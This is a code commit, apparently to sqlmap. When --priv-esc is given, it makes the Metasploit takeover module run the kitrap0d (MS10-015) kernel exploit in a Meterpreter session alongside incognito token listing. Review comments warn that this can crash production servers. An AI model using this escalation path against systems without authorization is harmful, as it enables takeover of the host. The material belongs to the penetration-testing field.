

Commit 6437c16

committed
Run the kitrap0d script in addition to listing Windows impersonation tokens via Meterpreter's incognito extension when --priv-esc is provided (see #149).
1 parent a97e20d commit 6437c16

2 files changed

Lines changed: 14 additions & 6 deletions


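--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -187,9 +187,10 @@ def __selectEncoder(self, encode=True):
 def __selectPayload(self, askChurrasco=True):
 if kb.os == "Windows" and conf.privEsc:
 infoMsg = "forcing Metasploit payload to Meterpreter because "
-infoMsg += "it is the only payload that can abuse Windows "
-infoMsg += "Access Tokens via Meterpreter 'incognito' "
-infoMsg += "extension to privilege escalate"
+infoMsg += "it is the only payload that can be used to "
+infoMsg += "escalate privileges, either via 'incognito' "
+infoMsg += "extension or via 'kitrap0d' script, "
+infoMsg += "http://tinyurl.com/kitrap0d for details"
 logger.info(infoMsg)
 
 __payloadStr = "windows/meterpreter"
@@ -458,6 +459,12 @@ def __loadMetExtensions(self, proc, metSess):
 
 proc.stdin.write("list_tokens -u\n")
 
+infoMsg = "trying also to escalate privileges using "
+infoMsg += "kitrap0d script"
+logger.info(infoMsg)
+
+proc.stdin.write("run kitrap0d\n")
+
 def __controlMsfCmd(self, proc, func):
 stdin_fd = sys.stdin.fileno()
 setNonBlocking(stdin_fd)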
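Review bot: `proc.stdin.write("run kitrap0d\n")` fires the MS10-015 kernel exploit unconditionally on every Windows target whenever --priv-esc is set, immediately after `list_tokens -u`, with no check that the session is not already SYSTEM, no check that the host is 32-bit (kitrap0d abuses the NT VDM subsystem and is useless on x64), and no confirmation from the user that a kernel exploit may be thrown at what is usually a production database server — a failed attempt can blue-screen the host, which is a very different risk profile from token impersonation. At minimum the write should be preceded by an explicit warning in the style this code already uses, e.g. `warnMsg = "kitrap0d (MS10-015) is a kernel exploit for 32-bit Windows; a failed attempt can crash the target"` / `logger.warn(warnMsg)`, and ideally be gated behind a confirmation prompt or an architecture check if the knowledge base carries one (not visible in this hunk). The script's output is also never read back, so neither success nor failure is reported to the user. `__loadMetExtensions` begins outside the hunk.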

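--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -165,15 +165,16 @@ def osPwn(self):
 warnMsg = "by default PostgreSQL on Windows runs as postgres "
 warnMsg += "user which has no Windows Impersonation "
 warnMsg += "Tokens: it is unlikely that the privilege "
-warnMsg += "escalation will be successful"
+warnMsg += "escalation via 'incognito' extension will "
+warnMsg += "be successful"
 logger.warn(warnMsg)
 
 elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
 warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
 warnMsg += "runs as Network Service which has no Windows "
 warnMsg += "Impersonation Tokens within all threads, this "
-warnMsg += "makes Meterpreter's incognito extension to "
-warnMsg += "fail to list tokens"
+warnMsg += "makes Meterpreter's 'incognito' extension "
+warnMsg += "to fail to list tokens"
 logger.warn(warnMsg)
 
 uploaded = self.uploadChurrasco()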
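Review bot: Both reworded warnings still describe only the incognito path, but with this commit --priv-esc also runs the kitrap0d kernel exploit (the `run kitrap0d` addition in lib/takeover/metasploit.py), so a user who reads "unlikely that the privilege escalation via 'incognito' extension will be successful" is not told that a crash-prone kernel exploit will be attempted regardless of the token situation. Since these warnings are the only notice the user gets before the takeover proceeds, consider extending the PostgreSQL message with a line such as `warnMsg += "; the kitrap0d kernel exploit will still be attempted"` and adding the same to the Microsoft SQL Server branch, so the text matches what the tool is about to do. `osPwn` begins and ends outside the hunk.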
